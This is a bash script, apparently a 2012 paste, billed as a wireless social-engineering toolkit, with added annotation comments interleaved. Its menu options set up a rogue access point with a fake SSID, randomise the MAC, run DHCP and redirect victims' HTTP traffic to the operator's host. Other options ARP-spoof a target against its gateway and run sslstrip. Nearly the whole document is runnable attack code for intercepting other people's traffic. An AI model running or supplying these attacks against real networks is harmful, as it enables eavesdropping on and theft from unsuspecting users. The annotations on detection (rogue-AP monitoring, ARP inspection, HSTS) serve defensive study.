securitytutorials

Wireless Social Engineering Toolkit

Apr 6th, 2012
  1. #!/bin/bash
  2. #This program sets up a fake access point and redirects all traffic to
  3. #you...created by johnny
  4. #resources:
  5. #http://teh-geek.com/?p=512
  6. #forward all traffic to host:iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  7.  
  function intro {
    # Wipe the terminal, then print the fixed nine-line title banner.
    # Takes no arguments and reads no globals; output goes to stdout.
    clear
    printf '%s\n' \
      '###############################################################################' \
      '#                        Wireless Social Engineering Toolkit                  #' \
      '#                                                                             #' \
      '#                       This is a Wireless Social Engineering                 #' \
      '#                    Toolkit that helps you with wireless attacks             #' \
      '#                                                                             #' \
      '#                                                                             #' \
      '#                                Created by Johnny                            #' \
      '###############################################################################'
  }
  20.  
  function choose {
    # Show the banner and the five-entry menu, read one line into the global
    # ATTACK, and hand control to the matching attackN function.
    # Only the exact strings 1 to 5 are accepted; anything else prints a hint
    # and the function returns without dispatching.
    intro
    printf '%s\n' \
      "What type of wireless attack do you want to do[1/2]?" \
      "1. Create Access Point and Forward all internet traffic to the Internet" \
      "2. Create Access Point and forward all traffic to your localhost" \
      "3. Create access point and forward all traffic to your localhost and then the internet" \
      "4. Commense mitm attack and run sslstrip" \
      "5. Commense mitm attack and forward all internet traffic to you and then the internet after attack"
    read ATTACK
    case "$ATTACK" in
      1) attack1 ;;
      2) attack2 ;;
      3) attack3 ;;
      4) attack4 ;;
      5) attack5 ;;
      *) echo "Please select the correct number" ;;
    esac
  }
  51.  
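  function setup {
    # One-time preparation of the DHCP server the access-point options use.
    # Asks whether dhcp3-server is already configured:
    #   y     - nothing is changed
    #   n     - installs dhcp3-server with apt-get, backs up the current
    #           /etc/dhcp3/dhcpd.conf and writes a new one
    #   other - prints a hint
    # The generated config serves 192.168.2.130-140 on 192.168.2.128/25 with
    # router 192.168.2.129 and DNS 8.8.8.8.
    # Globals:  DHCP (written by read)
    # Returns:  1 if the install, the backup or the config write fails;
    #           otherwise the status of the final `clear`.
    local conf=/etc/dhcp3/dhcpd.conf
    local backup=${conf}.backup

    intro
    echo "Have you already set up dhcp3-server[y/n]?"
    read -r DHCP
    case "$DHCP" in
      y)
        echo ""
        ;;
      n)
        echo "[>] Installing dhcp3-server[please wait]..."
        # Stop here on failure: the steps below would otherwise move or
        # overwrite system files and still report success.
        if ! apt-get install dhcp3-server -y &>/dev/null; then
          echo "[!] Installing dhcp3-server failed; dhcpd.conf left untouched" >&2
          return 1
        fi
        echo "[>] Installation finished"
        # A second run must not replace the first backup, which holds the
        # operator's original config, with the file this function generated.
        if [ -e "$backup" ]; then
          echo "[>] Keeping existing backup $backup"
        elif [ -e "$conf" ]; then
          echo "[>] Backing up dchpd.conf to /etc/dhcp3/dhcpd.conf.backup"
          mv -- "$conf" "$backup" || return 1
        fi
        echo "[>] Seting up configuration file"
        printf '%s\n' \
          'ddns-update-style ad-hoc;' \
          'default-lease-time 600;' \
          'max-lease-time 7200;' \
          'subnet 192.168.2.128 netmask 255.255.255.128 {' \
          'option subnet-mask 255.255.255.128;' \
          'option broadcast-address 192.168.2.255;' \
          'option routers 192.168.2.129;' \
          'option domain-name-servers 8.8.8.8;' \
          'range 192.168.2.130 192.168.2.140;' \
          '}' > "$conf" || return 1
        echo "[>] Finished dhcp setup"
        read -r -p "Press [Enter] key to continue..."
        ;;
      *)
        echo "Please select y or n"
        ;;
    esac
    clear
  }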
  84.  
  85. function attack1 {
          # Menu option 1. Prompts for four values, then, in order: randomizes
          # the MAC of $FAKEAP, starts monitor mode on it, runs airbase-ng on
          # mon0 in a new gnome-terminal window, addresses at0 and starts dhcpd
          # on it, and replaces the host's iptables rules with NAT out of
          # $REALAP.
          # Globals written: FAKEAP, REALAP, SSID, CHANNEL (plain read, not
          # local).
          # Returns: never; the function ends with `exit`, which ends the
          # whole script.
          # Left on this host after exit: the flushed iptables tables holding
          # only the rules added here, ip_forward=1, and the randomized MAC.
          # None of the teardown lines revert them.
          # Network-side view: the AP appears as a new BSSID advertising $SSID,
          # which is what rogue-AP monitoring keyed on an SSID/BSSID allowlist
          # looks for.
  86.     #sets up values for method 1(forwards all internet traffic to internet)
  87.     #interface
  88.     clear
  89.     intro
  90.     echo What is your fake AP interface [ex.wlan0]\:
  91.     read FAKEAP
  92.     clear
  93.     #connected interface
  94.     intro  
  95.     echo What is your interface that is connected to the Internet?
  96.     read REALAP
  97.     clear
  98.     #ssid
  99.     intro
  100.     echo SSID of your fake AP [ex.FreeHotspot with no spaces]\:
  101.     read SSID
  102.     clear
  103.     #channel
  104.     intro
  105.     echo Channel of your fake AP [1-12]?
  106.     read CHANNEL
  107.     #checking
  108.     clear
  109.     intro
  110.     echo "Is this what you selected?"
  111.     echo "Fake AP interface: $FAKEAP"
  112.     echo "Connected infterface: $REALAP"
  113.     echo "SSID: $SSID"
  114.     echo "Channel: $CHANNEL"
  115.     echo
           # Display only: Enter is the sole input accepted here, so there is
           # no path back to re-enter a value.
  116.     read -p "Press [Enter] key to continue..."
  117.     clear
  118.     #end of setting up variables
  119.     #load interfaces
  120.     intro
  121.     echo "[>] Changing fake AP MAC address to random"
           # The values read above are expanded unquoted and unvalidated from
           # here on; a value containing whitespace is split into several
           # arguments.
  122.     ifconfig $FAKEAP down
  123.     macchanger -r $FAKEAP
  124.     ifconfig $FAKEAP up
  125.     #monitor mode
  126.     echo "[>] Putting your interface in monitor mode"
  127.     airmon-ng start $FAKEAP &>/dev/null
  128.     #creating access point
  129.     echo "[>] Creating new window for creating access point"
  130.     gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
           # Printed unconditionally; the exit status of the backgrounded
           # terminal is never checked.
  131.     echo "[*] Fake AP created"
  132.     sleep 2
  133.     #Setting up dhcp server
  134.     echo "[>] Setting up dhcp-server"
  135.     ifconfig at0 up
  136.     sleep 2
           # 192.168.2.129/25 is the router address in the dhcpd.conf that
           # setup writes. The && chain continues across the comment line
           # below, so the "Setting up iptables" echo prints only if all four
           # commands returned 0; the iptables line after it runs either way.
  137.     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
  138.     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
  139.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
  140.     /etc/init.d/dhcp3-server start &>/dev/null &&
  141.     #setting up iptables   
  142.     echo "[>] Setting up iptables"
           # Flushes every rule and deletes every user chain in the filter and
           # nat tables before adding MASQUERADE and FORWARD; the previous rule
           # set is not saved anywhere.
  143.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward
  144.     #exiting
  145.     read -p "Press [Enter] key to quit..."
           # Teardown covers monitor mode, at0, airbase-ng and the DHCP service
           # only.
  146.     echo "[>] Killing program safely"
  147.     echo "[>] Turning off monitor mode..."
  148.     airmon-ng stop mon0 &>/dev/null
  149.     echo "[>] Putting interface at0 down..."
  150.     ifconfig at0 down &>/dev/null
  151.     echo "[>] Shutting down airbase-ng"
  152.     killall airbase-ng
  153.     echo "[>] Stoping dchp server"
  154.     /etc/init.d/dhcp3-server stop &>/dev/null
  155.     echo "[*] Thank you for using this program!"
  156.     exit
  157. }
  158.  
  159. function attack2 {
           # Menu option 2. Same prompts and access-point bring-up as attack1,
           # but the iptables rules differ: there is no MASQUERADE rule, and a
           # nat PREROUTING rule rewrites the destination of TCP port 80
           # connections to 192.168.2.129, the address given to at0 below.
           # Globals written: FAKEAP, REALAP, SSID, CHANNEL. REALAP is prompted
           # for but only appears in commented-out lines of this function.
           # Returns: never; the function ends with `exit`.
           # Left on this host after exit: the flushed iptables tables holding
           # only the rules added here, ip_forward=1, and the randomized MAC.
           # Client-side view: only TCP port 80 is matched by the DNAT rule;
           # connections to other ports, HTTPS included, are not rewritten.
  160.     #sets up values for method 2(forwards all internet traffic to localhost without internet)  
  161.     #interface
  162.     clear
  163.     intro
  164.     echo What is your fake AP interface [ex.wlan0]\:
  165.     read FAKEAP
  166.     clear
  167.     #connected interface
  168.     intro  
  169.     echo What is your interface that is connected to the Internet?
  170.     read REALAP
  171.     clear
  172.     #ssid
  173.     intro
  174.     echo SSID of your fake AP [ex.FreeHotspot with no spaces]\:
  175.     read SSID
  176.     clear
  177.     #channel
  178.     intro
  179.     echo Channel of your fake AP [1-12]?
  180.     read CHANNEL
  181.     #checking
  182.     clear
  183.     intro
  184.     echo "Is this what you selected?"
  185.     echo "Fake AP interface: $FAKEAP"
  186.     echo "SSID: $SSID"
  187.     echo "Channel: $CHANNEL"
  188.     echo
  189.     read -p "Press [Enter] key to continue..."
  190.     clear
  191.  
  192.     #before good after bad
  193.  
  194.         #end of setting up variables
  195.     #load interfaces
  196.     intro
  197.     echo "[>] Changing fake AP MAC address to random"
           # The values read above are expanded unquoted and unvalidated from
           # here on; a value containing whitespace is split into several
           # arguments.
  198.     ifconfig $FAKEAP down
  199.     macchanger -r $FAKEAP
  200.     ifconfig $FAKEAP up
  201.     #monitor mode
  202.     echo "[>] Putting your interface in monitor mode"
  203.     airmon-ng start $FAKEAP &>/dev/null
  204.     #creating access point
  205.     echo "[>] Creating new window for creating access point"
  206.     gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
  207.     echo "[*] Fake AP created"
  208.     sleep 2
  209.     #Setting up dhcp server
  210.     echo "[>] Setting up dhcp-server"
  211.     ifconfig at0 up
  212.     sleep 2
  213.     echo "[>] Setting up iptables"
           # The && chain continues across the "#iptables" comment line, so the
           # whole iptables line runs only if the address, route and both DHCP
           # commands returned 0.
  214.     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
  215.     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
  216.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
  217.     /etc/init.d/dhcp3-server start &>/dev/null &&
  218.     #iptables
           # Flushes every rule and deletes every user chain in the filter and
           # nat tables, then adds FORWARD accept from at0 and the port 80 DNAT
           # rule. The PREROUTING rule names no input interface, so it applies
           # to TCP/80 arriving on any interface of this host.
  219.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  220. #   original tables connected to internet
  221. #   /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  222.     echo "[>] Finished"
  223.     #--out-interface $REALAP
  224.     #exiting
  225.     read -p "Press [Enter] key to quit..."
           # Teardown covers monitor mode, at0, airbase-ng and the DHCP service
           # only; the DNAT rule stays in the nat table.
  226.     echo "[>] Killing program safely"
  227.     echo "[>] Turning off monitor mode..."
  228.     airmon-ng stop mon0 &>/dev/null
  229.     echo "[>] Putting interface at0 down..."
  230.     ifconfig at0 down &>/dev/null
  231.     echo "[>] Shutting down airbase-ng"
  232.     killall airbase-ng
  233.     echo "[>] Stoping dchp server"
  234.     /etc/init.d/dhcp3-server stop &>/dev/null
  235.     echo "[*] Thank you for using this program!"
  236.     exit   
  237. }
  238.  
  239. function attack3 {
           # Menu option 3. Prompts for the wireless interface, SSID and
           # channel (no uplink interface is asked for), brings up the access
           # point and DHCP as attack2 does, and applies the same port 80 DNAT
           # rule set. After the first Enter it runs that rule set again, then
           # waits for a second Enter before teardown.
           # Globals written: FAKEAP, SSID, CHANNEL.
           # Returns: never; the function ends with `exit`.
           # Left on this host after exit: the flushed iptables tables holding
           # only the rules added here, ip_forward=1, and the randomized MAC.
           # Client-side view: only TCP port 80 is matched by the DNAT rule;
           # connections to other ports, HTTPS included, are not rewritten.
  240.     #sets up values for method 3(forwards all internet traffic to localhost then internet) 
  241.     #interface
  242.     clear
  243.     intro
  244.     echo What is your fake AP interface [ex.wlan0]\:
  245.     read FAKEAP
  246.     clear
  247.     #ssid
  248.     intro
  249.     echo SSID of your fake AP [ex.FreeHotspot with no spaces]\:
  250.     read SSID
  251.     clear
  252.     #channel
  253.     intro
  254.     echo Channel of your fake AP [1-12]?
  255.     read CHANNEL
  256.     #checking
  257.     clear
  258.     intro
  259.     echo "Is this what you selected?"
  260.     echo "Fake AP interface: $FAKEAP"
  261.     echo "SSID: $SSID"
  262.     echo "Channel: $CHANNEL"
  263.     echo
  264.     read -p "Press [Enter] key to continue..."
  265.     clear
  266.  
  267.     #before good after bad
  268.  
  269.         #end of setting up variables
  270.     #load interfaces
  271.     intro
  272.     echo "[>] Changing fake AP MAC address to random"
           # The values read above are expanded unquoted and unvalidated from
           # here on; a value containing whitespace is split into several
           # arguments.
  273.     ifconfig $FAKEAP down
  274.     macchanger -r $FAKEAP
  275.     ifconfig $FAKEAP up
  276.     #monitor mode
  277.     echo "[>] Putting your interface in monitor mode"
  278.     airmon-ng start $FAKEAP &>/dev/null
  279.     #creating access point
  280.     echo "[>] Creating new window for creating access point"
  281.     gnome-terminal --title="airbase-ng" -x airbase-ng -e $SSID -c $CHANNEL mon0 &
  282.     echo "[*] Fake AP created"
  283.     sleep 2
  284.     #Setting up dhcp server
  285.     echo "[>] Setting up dhcp-server"
  286.     ifconfig at0 up
  287.     sleep 2
  288.     echo "[>] Setting up iptables"
           # The && chain continues across the "#iptables" comment line, so the
           # first iptables line runs only if the address, route and both DHCP
           # commands returned 0.
  289.     ifconfig at0 192.168.2.129 netmask 255.255.255.128 &&
  290.     route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 &&
  291.     dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &>/dev/null &&
  292.     /etc/init.d/dhcp3-server start &>/dev/null &&
  293.     #iptables
           # Flushes every rule and deletes every user chain in the filter and
           # nat tables, then adds FORWARD accept from at0 and the port 80 DNAT
           # rule; the previous rule set is not saved anywhere.
  294.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  295. #   original tables connected to internet
  296. #   /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --table nat --append POSTROUTING --out-interface $REALAP -j MASQUERADE && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  297.     echo "[>] Finished"
  298.     #--out-interface $REALAP
  299.     #exiting
  300.     read -p "Press [Enter] key to give them internet..."
           # This line repeats the rule set applied above verbatim: it contains
           # no MASQUERADE rule and no out-interface, and REALAP is not read in
           # this function.
  301.     /sbin/iptables --flush && /sbin/iptables --table nat --flush && /sbin/iptables --delete-chain && /sbin/iptables --table nat --delete-chain && /sbin/iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 > /proc/sys/net/ipv4/ip_forward && iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.2.129
  302.     read -p "Press [Enter] key to quit..."
           # Teardown covers monitor mode, at0, airbase-ng and the DHCP service
           # only; the DNAT rule stays in the nat table.
  303.     echo "[>] Killing program safely"
  304.     echo "[>] Turning off monitor mode..."
  305.     airmon-ng stop mon0 &>/dev/null
  306.     echo "[>] Putting interface at0 down..."
  307.     ifconfig at0 down &>/dev/null
  308.     echo "[>] Shutting down airbase-ng"
  309.     killall airbase-ng
  310.     echo "[>] Stoping dchp server"
  311.     /etc/init.d/dhcp3-server stop &>/dev/null
  312.     echo "[*] Thank you for using this program!"
  313.     exit   
  314. }
  315.  
  316. function attack4 {
           # Menu option 4. Prompts for an interface, a target IP and a gateway
           # IP, then runs, in the order written: the ip_forward write,
           # arpspoof, a nat REDIRECT of TCP port 80 to local port 10000, and
           # sslstrip.py in a new gnome-terminal window.
           # Globals written: INTERFACE, TARGETIP, GATEWAY (plain read, not
           # local; expanded unquoted and unvalidated).
           # Returns: to the caller; unlike attack1-3 there is no `exit`.
           # Left on this host afterwards: ip_forward=1 and the REDIRECT rule
           # in the nat table; teardown only issues two killall commands.
           # Defensive view: `arpspoof -t $TARGETIP $GATEWAY` addresses the
           # target's ARP cache entry for the gateway, a change that ARP
           # monitoring on the host and dynamic ARP inspection on the switch
           # are designed to catch. Only TCP port 80 is redirected, and
           # browsers that already hold an HSTS policy for a site do not send
           # it plain HTTP.
  317.     #commense an mitm attack that forwards traffic
  318.     #interface
  319.     clear
  320.     intro
  321.     echo What is your interface connected to the wireless[ex.wlan0]\:
  322.     read INTERFACE
  323.     clear
  324.     #target
  325.     clear
  326.     intro
  327.     echo What is your target ip [ex.192.168.1.2]\:
  328.     read TARGETIP
  329.     clear  
  330.     #gateway
  331.     clear
  332.     intro
  333.     echo What is your gateway ip [ex.192.168.1.1]\:
  334.     read GATEWAY
  335.     clear
  336.     #checking
  337.     clear
  338.     intro
  339.     echo "Is this what you selected?"
  340.     echo "Your connected nterface: $INTERFACE"
  341.     echo "Target ip: $TARGETIP"
  342.     echo "Gateway: $GATEWAY"
  343.     echo
  344.     read -p "Press [Enter] key to continue..."
  345.     clear
  346.     echo 1 > /proc/sys/net/ipv4/ip_forward
  347.     arpspoof -i $INTERFACE -t $TARGETIP $GATEWAY
           # The rule is appended to whatever the nat table already holds; this
           # function does not flush first and never deletes the rule.
  348.     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
           # Hard-coded install path; no check that the file exists.
  349.     gnome-terminal --title="sslstrip" -x python /pentest/web/sslstrip/sslstrip.py &
  350.     echo "[*] MITM attack finished"
  351.     read -p "Press [Enter] key to quit..."
  352.     echo "[>] Killing arpspoof"
  353.     killall arpspoof
  354.     echo "[>] Sslstrip"
  355.     killall sslstrip
  356.     echo "[*] Finshed"
  357.     echo "[*] Thank you for using this program!"
  358. }
  359.  
  360. function attack5 {
           # Menu option 5. Same three prompts as attack4 (INTERFACE, TARGETIP,
           # GATEWAY), then runs, in the order written, the ip_forward line,
           # arpspoof and one iptables command, each with &>/dev/null appended
           # so neither output nor errors are shown.
           # Globals written: INTERFACE, TARGETIP, GATEWAY (plain read, not
           # local; expanded unquoted and unvalidated).
           # Returns: to the caller; there is no `exit`.
           # The header comment below mentions apache, but nothing in this
           # function starts or addresses a web server.
           # Teardown is `killall arpspoof` only; whatever the iptables command
           # appended stays in the nat table.
           # Defensive view: `arpspoof -t $TARGETIP $GATEWAY` addresses the
           # target's ARP cache entry for the gateway, a change that ARP
           # monitoring and dynamic ARP inspection are designed to catch.
  361.     #commense an mitm attack that forwards traffic to apache
  362.     #interface
  363.     clear
  364.     intro
  365.     echo What is your interface connected to the wireless[ex.wlan0]\:
  366.     read INTERFACE
  367.     clear
  368.     #target
  369.     clear
  370.     intro
  371.     echo What is your target ip [ex.192.168.1.2]\:
  372.     read TARGETIP
  373.     clear  
  374.     #gateway
  375.     clear
  376.     intro
  377.     echo What is your gateway ip [ex.192.168.1.1]\:
  378.     read GATEWAY
  379.     clear
  380.     #checking
  381.     clear
  382.     intro
  383.     echo "Is this what you selected?"
  384.     echo "Your connected nterface: $INTERFACE"
  385.     echo "Target ip: $TARGETIP"
  386.     echo "Gateway: $GATEWAY"
  387.     echo
  388.     read -p "Press [Enter] key to continue..."
  389.     clear
           # NOTE(review): this line carries two redirections, `>` to
           # ip_forward and then `&>` to /dev/null; confirm where the 1 ends up.
  390.     echo 1 > /proc/sys/net/ipv4/ip_forward &>/dev/null
  391.     arpspoof -i $INTERFACE -t $TARGETIP $GATEWAY &>/dev/null
           # Unlike attack4, the rule names no -j target and no --to-ports.
  392.     iptables -t nat -A PREROUTING -p tcp --destination-port 80 &>/dev/null
  393.     echo "[*] MITM attack finished"
  394.     read -p "Press [Enter] key to continue..."
  395.     echo "[>] Killing arpspoof"
  396.     killall arpspoof
  397.     echo "[*] Finshed"
  398.     echo "[*] Thank you for using this program!"
  399. }
  400.  
  401. #Executing here
       # Entry point: setup runs first (DHCP server prompt), then choose shows
       # the menu once and dispatches to one attackN function. There is no
       # loop, so an invalid menu choice ends the script.
  402. setup
  403. choose